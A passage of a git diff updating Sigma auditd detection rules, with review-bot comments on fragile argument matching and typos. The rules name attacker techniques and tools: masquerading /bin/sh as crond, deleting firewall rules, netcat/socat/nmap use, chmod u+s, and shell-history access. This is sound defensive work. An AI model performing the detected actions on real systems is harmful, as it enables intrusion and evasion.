@@ -1,24 +1,25 @@ title: Masquerading as Linux Crond Process id: 9d4548fa-bba0-4e88-bd66-5d5bf516cda0 status: test -description: Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed. -author: Timur Zinniatullin, oscd.community +description: | + Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. + Several different variations of this technique have been observed. references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md + - https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process +author: Timur Zinniatullin, oscd.community date: 2019/10/21 -modified: 2021/11/27 +modified: 2023/08/22 +tags: + - attack.defense_evasion + - attack.t1036.003 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'execve' - a0: 'cp' - a1: '-i' - a2: '/bin/sh' - a3|endswith: '/crond' - condition: selection + selection: + type: 'execve' + a0: 'cp' + a1: '/bin/sh' + a2|endswith: '/crond' + condition: selection level: medium -tags: - - attack.defense_evasion - - attack.t1036.003 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_modify_system_firewall.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_modify_system_firewall.yml new file mode 100644 index 000000000..3a042511c --- /dev/null +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_modify_system_firewall.yml 
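Review bot: The rewritten selection pins `/bin/sh` to `a1` and the `/crond` destination to `a2`, so any option placed between `cp` and the source path shifts the indices and the event is missed; the previous version of this very rule matched exactly such a shape, with `-i` at `a1`. Matching the two paths with `|contains` or `|endswith` on the relevant argument fields, or keeping both layouts as alternatives under a `1 of` condition, would stop the detection from depending on argument position. The same positional anchoring appears in the new firewall rule (`a1|contains` for all three tools), in the network-sniffing rule (`a1: '-c'` before the interface option), and in the `chmod` selection of the suspicious-commands rule (`a1: 777`).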
@@ -0,0 +1,37 @@ +title: Modify System Firewall +id: 323ff3f5-0013-4847-bbd4-250b5edb62cc +related: + - id: 53059bc0-1472-438b-956a-7508a94a91f0 + type: similar +status: test +description: | + Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access. + Detection rules that match only on the disabling of firewalls will miss this. +references: + - https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html + - https://blog.aquasec.com/container-security-tnt-container-attack +author: IAI +date: 2023/03/06 +tags: + - attack.t1562.004 + - attack.defense_evasion +logsource: + product: linux + service: auditd +detection: + selection1: + type: 'EXECVE' + a0: 'iptables' + a1|contains: 'DROP' + selection2: + type: 'EXECVE' + a0: 'firewall-cmd' + a1|contains: 'remove' + selection3: + type: 'EXECVE' + a0: 'ufw' + a1|contains: 'delete' + condition: 1 of selection* +falsepositives: + - Legitimate admin activity +level: medium diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_network_service_scanning.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_network_service_scanning.yml index ff1e827e6..9606fc5ae 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_network_service_scanning.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_network_service_scanning.yml 
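Review bot: For `iptables`, `DROP` is a jump target that follows `-j`, while the command flag (`-D`, `-A`, `-P`) normally occupies `a1`, so `a1|contains: 'DROP'` will rarely match a real invocation — and when it does, it is matching the insertion of a drop rule rather than the removal the `description` talks about. If rule deletion is the intent, `a1: '-D'` is closer to the stated purpose (with the `-t table` form shifting the index by two); if inserted drop rules are also in scope, the description should say so. `firewall-cmd` likewise often takes `--permanent` or `--zone=` before the `--remove-*` option, so `a1|contains: 'remove'` only covers invocations where the removal option comes first.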
@@ -1,32 +1,34 @@ -title: Linux Network Service Scanning +title: Linux Network Service Scanning - Auditd id: 3761e026-f259-44e6-8826-719ed8079408 related: - id: 3e102cd9-a70d-4a7a-9508-403963092f31 type: derived -status: experimental +status: test description: Detects enumeration of local or remote network services. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md author: Alejandro Ortuno, oscd.community date: 2020/10/21 -modified: 2021/09/14 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md +modified: 2023/09/26 tags: - - attack.discovery - - attack.t1046 + - attack.discovery + - attack.t1046 logsource: - product: linux - service: auditd - definition: 'Configure these rules https://github.com/Neo23x0/auditd/blob/master/audit.rules#L182-L183' + product: linux + service: auditd + definition: 'Configure these rules https://github.com/Neo23x0/auditd/blob/e181243a7c708e9d579557d6f80e0ed3d3483b89/audit.rules#L182-L183' detection: - selection: - type: 'SYSCALL' - exe|endswith: - - '/telnet' - - '/nmap' - - '/netcat' - - '/nc' - key: 'network_connect_4' - condition: selection + selection: + type: 'SYSCALL' + exe|endswith: + - '/telnet' + - '/nmap' + - '/netcat' + - '/nc' + - '/ncat' + - '/nc.openbsd' + key: 'network_connect_4' + condition: selection falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_network_sniffing.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_network_sniffing.yml index 85be63038..f0b51e629 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_network_sniffing.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_network_sniffing.yml 
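Review bot: The `exe|endswith` list now covers `/ncat` and `/nc.openbsd` but not `/nc.traditional`, the other binary that `/usr/bin/nc` resolves to on Debian-derived systems; since `exe` in SYSCALL records reflects the executed binary rather than the symlink name, a `- '/nc.traditional'` entry would be consistent with the reasoning behind adding `nc.openbsd`. The `key: 'network_connect_4'` match still depends on the external audit.rules configuration, so pinning the `definition` link to a fixed revision is the right call.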
@@ -1,31 +1,33 @@ -title: Network Sniffing +title: Network Sniffing - Linux id: f4d3748a-65d1-4806-bd23-e25728081d01 status: test -description: Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. -author: Timur Zinniatullin, oscd.community +description: | + Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. + An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md +author: Timur Zinniatullin, oscd.community date: 2019/10/21 -modified: 2021/11/27 +modified: 2022/12/18 +tags: + - attack.credential_access + - attack.discovery + - attack.t1040 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection1: - type: 'execve' - a0: 'tcpdump' - a1: '-c' - a3|contains: '-i' - selection2: - type: 'execve' - a0: 'tshark' - a1: '-c' - a3: '-i' - condition: selection1 or selection2 + selection_1: + type: 'execve' + a0: 'tcpdump' + a1: '-c' + a3|contains: '-i' + selection_2: + type: 'execve' + a0: 'tshark' + a1: '-c' + a3: '-i' + condition: 1 of selection_* falsepositives: - - Legitimate administrator or user uses network sniffing tool for legitimate reasons. + - Legitimate administrator or user uses network sniffing tool for legitimate reasons. level: low -tags: - - attack.credential_access - - attack.discovery - - attack.t1040 
diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml index 29fe14e15..c899ed623 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml @@ -1,10 +1,16 @@ -title: OMIGOD SCX RunAsProvider ExecuteShellCommand +title: OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd id: 045b5f9c-49f7-4419-a236-9854fb3c827a -description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. -status: experimental -date: 2021/09/17 -modified: 2021/11/11 +status: test +description: | + Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. + SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. + Microsoft Azure, and Microsoft Operations Management Suite. +references: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://github.com/Azure/Azure-Sentinel/pull/3059 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +date: 2021/09/17 +modified: 2022/11/26 tags: - attack.privilege_escalation - attack.initial_access @@ -12,9 +18,6 @@ tags: - attack.t1068 - attack.t1190 - attack.t1203 -references: - - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - - https://github.com/Azure/Azure-Sentinel/pull/3059 logsource: product: linux service: auditd 
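Review bot: The description's third line, `Microsoft Azure, and Microsoft Operations Management Suite.`, begins after a period that should be a comma, so the product list reads as two broken sentences; `...including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.` is presumably what was meant. Since the commit already reflows this description into a block scalar, this is the moment to fix the wording.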
@@ -22,7 +25,7 @@ detection: selection: type: 'SYSCALL' syscall: 'execve' - uid: '0' + uid: 0 cwd: '/var/opt/microsoft/scx/tmp' comm: 'sh' condition: selection diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml index e017b7d48..a167a859d 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml 
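Review bot: `uid: 0` is now an unquoted integer, as are `a1: 777` in the suspicious-commands rule and the `0`/`6` keyword list in the shutdown/reboot rule further down; in auditd records these are string-valued fields, so whether the converted query still matches depends on the backend and the index mapping (a numeric term against a keyword field is coerced in some backends and a type mismatch in others). If the conversion path used here is known to coerce numbers to strings, a short comment on the first such line (`# string field in auditd; numeric literal relies on converter coercion`) would save the next reader from re-checking; otherwise the quoted form the rule had before is the safer choice.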
@@ -2,42 +2,41 @@ title: Password Policy Discovery id: ca94a6db-8106-4737-9ed2-3e3bb826af0a status: stable description: Detects password policy discovery commands -author: Ömer Günal, oscd.community, Pawel Mazur -date: 2020/10/08 -modified: 2021/11/12 references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md - - https://attack.mitre.org/techniques/T1201/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md - https://linux.die.net/man/1/chage - https://man7.org/linux/man-pages/man1/passwd.1.html - https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu +author: Ömer Günal, oscd.community, Pawel Mazur +date: 2020/10/08 +modified: 2022/12/18 +tags: + - attack.discovery + - attack.t1201 logsource: product: linux service: auditd detection: - files: - type: 'PATH' - name: - - '/etc/pam.d/common-password' - - '/etc/security/pwquality.conf' - - '/etc/pam.d/system-auth' - - '/etc/login.defs' - chage: - type: 'EXECVE' - a0: 'chage' - a1: - - '--list' - - '-l' - passwd: - type: 'EXECVE' - a0: 'passwd' - a1: - - '-S' - - '--status' - condition: files or chage or passwd + selection_files: + type: 'PATH' + name: + - '/etc/pam.d/common-password' + - '/etc/security/pwquality.conf' + - '/etc/pam.d/system-auth' + - '/etc/login.defs' + selection_chage: + type: 'EXECVE' + a0: 'chage' + a1: + - '--list' + - '-l' + selection_passwd: + type: 'EXECVE' + a0: 'passwd' + a1: + - '-S' + - '--status' + condition: 1 of selection_* falsepositives: - Legitimate administration activities level: low -tags: - - attack.discovery - - attack.t1201 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml index d7cc90375..1dbbda8d8 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml 
+++ b/src/main/resources/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml @@ -2,27 +2,26 @@ title: Systemd Service Reload or Start id: 2625cc59-0634-40d0-821e-cb67382a3dd7 status: test description: Detects a reload or a start of a service. -author: Jakob Weinzettl, oscd.community references: - - https://attack.mitre.org/techniques/T1543/002/ - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md +author: Jakob Weinzettl, oscd.community date: 2019/09/23 modified: 2021/11/27 +tags: + - attack.persistence + - attack.t1543.002 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'EXECVE' - a0|contains: 'systemctl' - a1|contains: - - 'daemon-reload' - - 'start' - condition: selection + selection: + type: 'EXECVE' + a0|contains: 'systemctl' + a1|contains: + - 'daemon-reload' + - 'start' + condition: selection falsepositives: - - Installation of legitimate service. - - Legitimate reconfiguration of service. + - Installation of legitimate service. + - Legitimate reconfiguration of service. level: low -tags: - - attack.persistence - - attack.t1543.002 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_screencapture_import.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_screencapture_import.yml index 4b9b6c736..083ec68bb 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_screencapture_import.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_screencapture_import.yml 
@@ -1,37 +1,40 @@ title: Screen Capture with Import Tool id: dbe4b9c5-c254-4258-9688-d6af0b7967fd -description: Detects adversary creating screen capture of a desktop with Import Tool. Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations. ImageMagick must be installed. +status: test +description: | + Detects adversary creating screen capture of a desktop with Import Tool. + Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations. + ImageMagick must be installed. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md + - https://linux.die.net/man/1/import + - https://imagemagick.org/ author: 'Pawel Mazur' -status: experimental date: 2021/09/21 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md - - https://attack.mitre.org/techniques/T1113/ - - https://linux.die.net/man/1/import - - https://imagemagick.org/ +modified: 2022/10/09 +tags: + - attack.collection + - attack.t1113 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - import: - type: EXECVE - a0: import - import_window_root: - a1: '-window' - a2: 'root' - a3|endswith: - - '.png' - - '.jpg' - - '.jpeg' - import_no_window_root: - a1|endswith: - - '.png' - - '.jpg' - - '.jpeg' - condition: import and (import_window_root or import_no_window_root) -tags: - - attack.collection - - attack.t1113 + import: + type: EXECVE + a0: import + import_window_root: + a1: '-window' + a2: 'root' + a3|endswith: + - '.png' + - '.jpg' + - '.jpeg' + import_no_window_root: + a1|endswith: + - '.png' + - '.jpg' + - '.jpeg' + condition: import and (import_window_root or import_no_window_root) falsepositives: - - Legitimate use of screenshot utility + - Legitimate use of screenshot utility level: low 
diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml index 0af916ba4..86ecd900b 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml @@ -1,31 +1,31 @@ title: Screen Capture with Xwd id: e2f17c5d-b02a-442b-9052-6eb89c9fec9c +status: test description: Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture + - https://linux.die.net/man/1/xwd author: 'Pawel Mazur' -status: experimental date: 2021/09/13 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md - - https://attack.mitre.org/techniques/T1113/ - - https://linux.die.net/man/1/xwd +modified: 2022/12/18 +tags: + - attack.collection + - attack.t1113 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - xwd: - type: EXECVE - a0: xwd - xwd_root_window: - a1: '-root' - a2: '-out' - a3|endswith: '.xwd' - xwd_no_root_window: - a1: '-out' - a2|endswith: '.xwd' - condition: xwd and (xwd_root_window or xwd_no_root_window) -tags: - - attack.collection - - attack.t1113 + selection: + type: EXECVE + a0: xwd + xwd_root_window: + a1: '-root' + a2: '-out' + a3|endswith: '.xwd' + xwd_no_root_window: + a1: '-out' + a2|endswith: '.xwd' + condition: selection and 1 of xwd_* falsepositives: - - Legitimate use of screenshot utility + - Legitimate use of screenshot utility level: low 
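Review bot: The description kept by the hunk still reads `screen capture of a full with xwd` and `due high usage`, which look like a dropped word and a dropped `to`; presumably `screen capture of a full screen with xwd` and `due to high usage of screenshot utilities on user workstations` were intended. Since this commit touches the header lines anyway, correcting the wording here would keep it in step with the import-tool rule, whose description was reflowed in the same change.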
diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml index ef91d1ef2..0878a35b3 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml @@ -1,23 +1,23 @@ -title: 'Split A File Into Pieces' +title: Split A File Into Pieces - Linux id: 2dad0cba-c62a-4a4f-949f-5f6ecd619769 status: test description: 'Detection use of the command "split" to split files into parts and possible transfer.' -author: 'Igor Fits, oscd.community' references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md +author: 'Igor Fits, oscd.community' date: 2020/10/15 -modified: 2021/11/27 +modified: 2022/11/28 +tags: + - attack.exfiltration + - attack.t1030 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'SYSCALL' - comm: 'split' - condition: selection + selection: + type: 'SYSCALL' + comm: 'split' + condition: selection falsepositives: - - Legitimate administrative activity + - Legitimate administrative activity level: low -tags: - - attack.exfiltration - - attack.t1030 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml index cc4cd5189..6408e58e7 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml 
@@ -1,30 +1,30 @@ title: Steganography Hide Files with Steghide id: ce446a9e-30b9-4483-8e38-d2c9ad0a2280 -description: Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. +status: test +description: Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. +references: + - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ author: 'Pawel Mazur' -status: experimental date: 2021/09/11 -references: - - https://attack.mitre.org/techniques/T1027/003/ - - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ +modified: 2022/10/09 tags: - - attack.defense_evasion - - attack.t1027.003 -falsepositives: - - Unknown -level: low + - attack.defense_evasion + - attack.t1027.003 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: steghide - a1: embed - a2: - - '-cf' - - '-ef' - a4: - - '-cf' - - '-ef' - condition: selection + selection: + type: EXECVE + a0: steghide + a1: embed + a2: + - '-cf' + - '-ef' + a4: + - '-cf' + - '-ef' + condition: selection +falsepositives: + - Unknown +level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml index 9dcd4df23..269f1c388 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml 
@@ -1,28 +1,28 @@ title: Steganography Extract Files with Steghide id: a5a827d9-1bbe-4952-9293-c59d897eb41b +status: test description: Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. +references: + - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ author: 'Pawel Mazur' -status: experimental date: 2021/09/11 -references: - - https://attack.mitre.org/techniques/T1027/003/ - - https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ +modified: 2022/10/09 tags: - - attack.defense_evasion - - attack.t1027.003 -falsepositives: - - Unknown -level: low + - attack.defense_evasion + - attack.t1027.003 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: steghide - a1: extract - a2: '-sf' - a3|endswith: - - '.jpg' - - '.png' - condition: selection + selection: + type: EXECVE + a0: steghide + a1: extract + a2: '-sf' + a3|endswith: + - '.jpg' + - '.png' + condition: selection +falsepositives: + - Unknown +level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml index 7641995de..47b022810 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml 
@@ -1,21 +1,24 @@ title: Suspicious C2 Activities id: f7158a64-6204-4d6d-868a-6e6378b467e0 status: test -description: Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'. This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132) -author: Marie Euler +description: | + Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'. + This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. + These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132) references: - - 'https://github.com/Neo23x0/auditd' + - https://github.com/Neo23x0/auditd +author: Marie Euler date: 2020/05/18 modified: 2021/11/27 +tags: + - attack.command_and_control logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - key: 'susp_activity' - condition: selection + selection: + key: 'susp_activity' + condition: selection falsepositives: - - Admin or User activity + - Admin or User activity level: medium -tags: - - attack.command_and_control diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_susp_cmds.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_susp_cmds.yml index b8c330a13..2845a12e1 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_susp_cmds.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_susp_cmds.yml 
@@ -2,35 +2,35 @@ title: Suspicious Commands Linux id: 1543ae20-cbdf-4ec1-8d12-7664d667a825 status: test description: Detects relevant commands often related to malware or hacking activity -author: Florian Roth references: - - Internal Research - mostly derived from exploit code including code in MSF + - Internal Research - mostly derived from exploit code including code in MSF +author: Florian Roth (Nextron Systems) date: 2017/12/12 -modified: 2021/11/27 +modified: 2022/10/05 +tags: + - attack.execution + - attack.t1059.004 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - cmd1: - type: 'EXECVE' - a0: 'chmod' - a1: '777' - cmd2: - type: 'EXECVE' - a0: 'chmod' - a1: 'u+s' - cmd3: - type: 'EXECVE' - a0: 'cp' - a1: '/bin/ksh' - cmd4: - type: 'EXECVE' - a0: 'cp' - a1: '/bin/sh' - condition: 1 of cmd* + cmd1: + type: 'EXECVE' + a0: 'chmod' + a1: 777 + cmd2: + type: 'EXECVE' + a0: 'chmod' + a1: 'u+s' + cmd3: + type: 'EXECVE' + a0: 'cp' + a1: '/bin/ksh' + cmd4: + type: 'EXECVE' + a0: 'cp' + a1: '/bin/sh' + condition: 1 of cmd* falsepositives: - - Admin activity + - Admin activity level: medium -tags: - - attack.execution - - attack.t1059.004 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml index b1cf17ce9..86b4ea4f8 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml 
@@ -2,43 +2,43 @@ title: Program Executions in Suspicious Folders id: a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc status: test description: Detects program executions in suspicious non-program folders related to malware or hacking activity -author: Florian Roth references: - - Internal Research + - Internal Research +author: Florian Roth (Nextron Systems) date: 2018/01/23 modified: 2021/11/27 +tags: + - attack.t1587 + - attack.t1584 + - attack.resource_development logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'SYSCALL' - exe|startswith: + selection: + type: 'SYSCALL' + exe|startswith: # Temporary folder - - '/tmp/' + - '/tmp/' # Web server - - '/var/www/' # Standard - - '/home/*/public_html/' # Per-user - - '/usr/local/apache2/' # Classical Apache - - '/usr/local/httpd/' # Old SuSE Linux 6.* Apache - - '/var/apache/' # Solaris Apache - - '/srv/www/' # SuSE Linux 9.* - - '/home/httpd/html/' # Redhat 6 or older Apache - - '/srv/http/' # ArchLinux standard - - '/usr/share/nginx/html/' # ArchLinux nginx + - '/var/www/' # Standard + - '/home/*/public_html/' # Per-user + - '/usr/local/apache2/' # Classical Apache + - '/usr/local/httpd/' # Old SuSE Linux 6.* Apache + - '/var/apache/' # Solaris Apache + - '/srv/www/' # SuSE Linux 9.* + - '/home/httpd/html/' # Redhat 6 or older Apache + - '/srv/http/' # ArchLinux standard + - '/usr/share/nginx/html/' # ArchLinux nginx # Data dirs of typically exploited services (incomplete list) - - '/var/lib/pgsql/data/' - - '/usr/local/mysql/data/' - - '/var/lib/mysql/' - - '/var/vsftpd/' - - '/etc/bind/' - - '/var/named/' - condition: selection + - '/var/lib/pgsql/data/' + - '/usr/local/mysql/data/' + - '/var/lib/mysql/' + - '/var/vsftpd/' + - '/etc/bind/' + - '/var/named/' + condition: selection falsepositives: - - Admin activity (especially in /tmp folders) - - Crazy web applications + - Admin activity (especially in /tmp folders) + - Crazy web applications level: medium 
-tags: - - attack.t1587 - - attack.t1584 - - attack.resource_development diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml index 4eaefc716..63c13cebc 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml @@ -1,36 +1,36 @@ -title: 'Suspicious History File Operations' +title: Suspicious History File Operations - Linux id: eae8ce9f-bde9-47a6-8e79-f20d18419910 status: test description: 'Detects commandline operations on shell history files' -author: 'Mikhail Larin, oscd.community' references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md +author: 'Mikhail Larin, oscd.community' date: 2020/10/17 -modified: 2021/11/27 +modified: 2022/11/28 +tags: + - attack.credential_access + - attack.t1552.003 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - execve: - type: EXECVE - history: - - '.bash_history' - - '.zsh_history' - - '.zhistory' - - '.history' - - '.sh_history' - - 'fish_history' - condition: execve and history + execve: + type: EXECVE + history: + - '.bash_history' + - '.zsh_history' + - '.zhistory' + - '.history' + - '.sh_history' + - 'fish_history' + condition: execve and history fields: - - a0 - - a1 - - a2 - - a3 - - key + - a0 + - a1 + - a2 + - a3 + - key falsepositives: - - Legitimate administrative activity - - Legitimate software, cleaning hist file + - Legitimate administrative activity + - Legitimate software, cleaning hist file level: medium -tags: - - attack.credential_access - - attack.t1552.003 
diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_system_info_discovery.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_system_info_discovery.yml index 223be5b49..40eb3f94a 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_system_info_discovery.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_system_info_discovery.yml @@ -1,31 +1,47 @@ -title: System Information Discovery +title: System Information Discovery - Auditd id: f34047d9-20d3-4e8b-8672-0a35cc50dc71 +status: test description: Detects System Information Discovery commands -author: 'Pawel Mazur' -status: experimental -date: 2021/09/03 references: - - https://attack.mitre.org/techniques/T1082/ - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md + - https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1082/T1082.md +author: Pawel Mazur +date: 2021/09/03 +modified: 2023/03/06 +tags: + - attack.discovery + - attack.t1082 logsource: - product: linux - service: auditd + product: linux + 